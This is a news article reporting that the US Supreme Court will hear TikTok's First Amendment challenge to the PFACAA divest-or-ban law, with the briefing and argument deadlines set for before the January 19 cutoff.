TikTok decided to make one last appeal, to the United States’ ultimate jurisdiction: the Supreme Court. The Supreme Court is not obliged to hear appeals, and usually decides to do so only when, according to its own guidance about its procedures, a matter “could have national significance, might harmonize conflicting decisions in the federal Circuit courts, and/or could have precedential value.”
In an order [PDF] published on Wednesday, the Supreme Court revealed it intends to consider whether the PFACAA violates the First Amendment and therefore the right to free speech.
Parties were given a December 27 deadline to file a 13,000-word brief, and a January 5 deadline to deliver a 6,000-word reply.
On January 10, the Court will stage a two-hour session to hear oral arguments.
When a decision will land is not known or spelled out in the order.
The Court might decide to rule quicky, as the PFACAA requires TikTok to find a new owner that has no ties to China or shut down on January 19 – just nine days after oral arguments will be heard.
Or it might decide that it can move more slowly, for two reasons. One is that the US president can authorize a one-off 90-day extension to the January 19 deadline – although the Biden administration has shown little interest in doing so. The other is that the inauguration of president-elect Donald Trump takes place on January 20, and there’s a school of thought that argues the new administration should have a chance to implement its policies.
TikTok welcomed the chance to put its case to the Supreme Court, in a brief statement that proclaimed “We believe the Court will find the TikTok ban unconstitutional so the over 170 million Americans on our platform can continue to exercise their free speech rights.”
The White House appears not to have commented on the matter.
No suitable US-based entity has signaled an interest in acquiring TikTok – an act that would mean it can continue operating stateside. Even if a buyer emerged, ByteDance is not keen to sell. ®
